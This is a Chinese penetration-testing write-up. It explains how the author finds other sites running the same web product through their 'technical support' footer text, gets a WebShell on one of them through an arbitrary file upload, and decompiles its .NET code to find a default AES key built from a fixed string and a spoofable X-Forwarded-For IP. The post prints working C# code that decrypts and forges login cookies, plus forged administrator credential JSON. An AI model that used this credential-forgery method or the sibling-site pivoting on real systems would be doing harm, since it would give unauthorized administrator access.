让渗透从黑盒变为“灰盒”

luozhenni

​
让渗透从黑盒变为“灰盒”
原文链接：让渗透从黑盒变为“灰盒”
Broken5 猪猪谈安全 2022-11-29 19:00 发表于江苏
0x01 前言
在进行渗透测试时，经常会遇到一些比较讨厌的问题。例如：没有账号、注册的账号功能有限、不知道后台在哪等等。下面会讲述一种解决思路
网站的底部通常会有备案、主办单位、承办单位、技术支持等信息。通过“技术支持”这样的关键字可以在搜索引擎中找到与目标应用相同的网站，对这些网站进行的简单的渗透。利用从这些网站上获取的漏洞信息，再去攻击目标网站，往往可以获取很大的收益。
0x02 案例
在目标网站下方发现“技术支持”关键字

​

编辑
利用FOFA搜索关键字，发现相同的系统应用，下文统称为A网站

​

编辑
对A网站进行渗透测试发现存在一处任意文件上传，很简单的就获取了一个WebShell
注：原来目标网站也有任意文件只不过修复了

​

编辑
在WEB目录下存在Log文件夹且命名方式可以爆破

​

编辑
把这个漏洞信息利用到目标网站去，访问/Log/2020/返回403，说明目录存在

​

编辑
但是利用发现的命名规则以及常见的命名规则进行爆破，并没有成功。可惜了....

​

编辑
跳过这个日志这个点继续渗透，发现用户的登录凭证很有特征，像是AES或者DES加密

​

编辑

既然是AES或者DES加密那么密钥肯定在配置文件中或者源码中，于是把A网站的源码打包下载。由于是.Net的网站所以还要用ILSpy反编译dll文件查看源码
定位到登录口，发现了加密算法为AES

​

编辑
跟进AES.Encode函数，发现其密钥获取方式："xxxxx"+IP

​

编辑
Utils.GetClientIP()获取的是XFF头，所以也是可控的

​

编辑
然后我就写了一个Decode进行一个验证

1. using System;
   
2. using System.Data;
   
3. using System.Configuration;
   
4. using System.Web;
   
5. using System.Web.Security;
   
6. using System.Web.UI;
   
7. using System.Web.UI.WebControls;
   
8. using System.Web.UI.WebControls.WebParts;
   
9. using System.Web.UI.HtmlControls;
   
10. using System.Security.Cryptography;
    
11. using System.IO;
    
12. using System.Text;
    
13. 
    
14. public class AES
    
15. {
    
16.     public static byte[] Keys = new byte[16]
    
17.     {
    
18.         65,
    
19.         114,
    
20.         101,
    
21.         121,
    
22.         111,
    
23.         117,
    
24.         109,
    
25.         121,
    
26.         83,
    
27.         110,
    
28.         111,
    
29.         119,
    
30.         109,
    
31.         97,
    
32.         110,
    
33.         63
    
34.     };
    
35. 
    
36.     public static string GetSubString(string p_SrcString, int p_StartIndex, int p_Length, string p_TailString)
    
37.     {
    
38.         string result = p_SrcString;
    
39.         byte[] bytes = Encoding.UTF8.GetBytes(p_SrcString);
    
40.         char[] chars = Encoding.UTF8.GetChars(bytes);
    
41.         foreach (char c in chars)
    
42.         {
    
43.             if ((c > 'ࠀ' && c < '一') || (c > '가' && c < '힣'))
    
44.             {
    
45.                 if (p_StartIndex >= p_SrcString.Length)
    
46.                 {
    
47.                     return "";
    
48.                 }
    
49.                 return p_SrcString.Substring(p_StartIndex, (p_Length + p_StartIndex > p_SrcString.Length) ? (p_SrcString.Length - p_StartIndex) : p_Length);
    
50.             }
    
51.         }
    
52.         if (p_Length >= 0)
    
53.         {
    
54.             byte[] bytes2 = Encoding.Default.GetBytes(p_SrcString);
    
55.             if (bytes2.Length > p_StartIndex)
    
56.             {
    
57.                 int num = bytes2.Length;
    
58.                 if (bytes2.Length > p_StartIndex + p_Length)
    
59.                 {
    
60.                     num = p_Length + p_StartIndex;
    
61.                 }
    
62.                 else
    
63.                 {
    
64.                     p_Length = bytes2.Length - p_StartIndex;
    
65.                     p_TailString = "";
    
66.                 }
    
67.                 int num2 = p_Length;
    
68.                 int[] array = new int[p_Length];
    
69.                 byte[] array2 = null;
    
70.                 int num3 = 0;
    
71.                 for (int j = p_StartIndex; j < num; j++)
    
72.                 {
    
73.                     if (bytes2[j] > 127)
    
74.                     {
    
75.                         num3++;
    
76.                         if (num3 == 3)
    
77.                         {
    
78.                             num3 = 1;
    
79.                         }
    
80.                     }
    
81.                     else
    
82.                     {
    
83.                         num3 = 0;
    
84.                     }
    
85.                     array[j] = num3;
    
86.                 }
    
87.                 if (bytes2[num - 1] > 127 && array[p_Length - 1] == 1)
    
88.                 {
    
89.                     num2 = p_Length + 1;
    
90.                 }
    
91.                 array2 = new byte[num2];
    
92.                 Array.Copy(bytes2, p_StartIndex, array2, 0, num2);
    
93.                 result = Encoding.Default.GetString(array2);
    
94.                 result += p_TailString;
    
95.             }
    
96.         }
    
97.         return result;
    
98.     }
    
99. 
    
100.     public static string Encode(string encryptString, string encryptKey)
     
101.     {
     
102.         encryptKey = GetSubString(encryptKey, 0, 32, "");
     
103.         encryptKey = encryptKey.PadRight(32, ' ');
     
104.         RijndaelManaged rijndaelManaged = new RijndaelManaged();
     
105.         rijndaelManaged.Key = Encoding.UTF8.GetBytes(encryptKey.Substring(0, 32));
     
106.         rijndaelManaged.IV = Keys;
     
107.         ICryptoTransform cryptoTransform = rijndaelManaged.CreateEncryptor();
     
108.         byte[] bytes = Encoding.UTF8.GetBytes(encryptString);
     
109.         byte[] inArray = cryptoTransform.TransformFinalBlock(bytes, 0, bytes.Length);
     
110.         return Convert.ToBase64String(inArray);
     
111.     }
     
112. 
     
113.     public static string Decode(string decryptString, string decryptKey)
     
114.     {
     
115.         try
     
116.         {
     
117.             decryptKey = GetSubString(decryptKey,0, 32, "");
     
118.             decryptKey = decryptKey.PadRight(32, ' ');
     
119.             RijndaelManaged rijndaelManaged = new RijndaelManaged();
     
120.             rijndaelManaged.Key = Encoding.UTF8.GetBytes(decryptKey);
     
121.             rijndaelManaged.IV = Keys;
     
122.             ICryptoTransform cryptoTransform = rijndaelManaged.CreateDecryptor();
     
123.             byte[] array = Convert.FromBase64String(decryptString);
     
124.             byte[] bytes = cryptoTransform.TransformFinalBlock(array, 0, array.Length);
     
125.             return Encoding.UTF8.GetString(bytes);
     
126.         }
     
127.         catch
     
128.         {
     
129.             return "";
     
130.         }
     
131.     }
     
132. 
     
133.     public static string Encode(string encryptString)
     
134.     {
     
135.         // 密钥
     
136.         return Encode(encryptString, "xxxxxx" + "127.0.0.1");
     
137.     }
     
138. 
     
139.     public static string Decode(string decryptString)
     
140.     {
     
141.         // 密钥
     
142.         return Decode(decryptString, "xxxxxx" + "127.0.0.1");
     
143.     }
     
144. 
     
145.     public static void Main(string[] args){
     
146.         // 解密用户凭证
     
147.         System.Console.WriteLine(Decode("xxxxx"));
     
148.     }
     
149. }

复制代码

验证步骤如下：

•         修改XFF头为127.0.0.1
  
  

​

编辑

•         随便注册个账号，登录目标网站，获取凭证
  
  

​

编辑

•         用Decode解密用户凭证
  
  

​

编辑

最终成功解密了，这说明目标网站用的也是默认的加密密钥，所以存在用户凭证伪造（任意用户登陆）
伪造普通用户危害总是有限的。所以继续查看代码，发现管理员凭证使用也是同一种加密方式

​

编辑
修改Cookie为Weiyum访问目标网站后台，结果返回没有权限

​

编辑
进入Admin的基类查看，原来是根据用户的ID做了权限检测

​

编辑
怎样获取管理的ID呢？通常一款后台应用初始肯定是有一个默认的管理用户的，那么他的ID应该不是随机的。通过之前获取A网站的WebShell查询数据库，得知默认的AdmidID为ba2fxxxxxxxxxxxxxxxxxxxxxxxxd49e21a
然后用伪造用户信息

1. {
   
2.     "Type": 0,
   
3.     "UserName": "71000019780612618X",
   
4.     "RealName": "邵霞",
   
5.     "Email": "test@qq.com",
   
6.     "Tel": "13888888888",
   
7.     "IDCard": "71000019780612618X",
   
8.     "Password": "ce1c1cdc2fac8e1167f22cd4bd88d324",
   
9.     "PasswordWay": "M",
   
10.     "Remark": "",
    
11.     "Avatar": "/Public/static/face/default_head_50.png",
    
12.     "Gender": 0,
    
13.     "Minority": "",
    
14.     "NativePlace": "",
    
15.     "Birth": "0001-01-01T00:00:00",
    
16.     "ID": "ba2fxxxxxxxxxxxxxxxxxxxxxxxxd49e21a",
    
17.     "CreateBy": "邵霞",
    
18.     "CreateOn": "2020-08-02T01:56:26",
    
19.     "UpdateBy": "",
    
20.     "UpdateOn": null,
    
21.     "Status": 1,
    
22.     "IsAdd": false
    
23. }

复制代码

利用Encode生成加密后的用户凭证public static void Main(string[] args){    System.Console.WriteLine(Encode("xxxx"));}

​

编辑
重新修改Weiyum，成功伪造管理员身份

​

编辑
0x03 总结

•         利用网站的技术支持信息去搜寻相同的应用，然后对其进行渗透，尝试获取有用的漏洞信息
  
•         通常可以尝试获取默认的密码规则，默认的日志、备份规则、默认的加密密钥
  
•         如果有条件可以下载源码，对其进行代码审计
  
  

原文于：https://xz.aliyun.com/t/8347原文作者：Broken5
​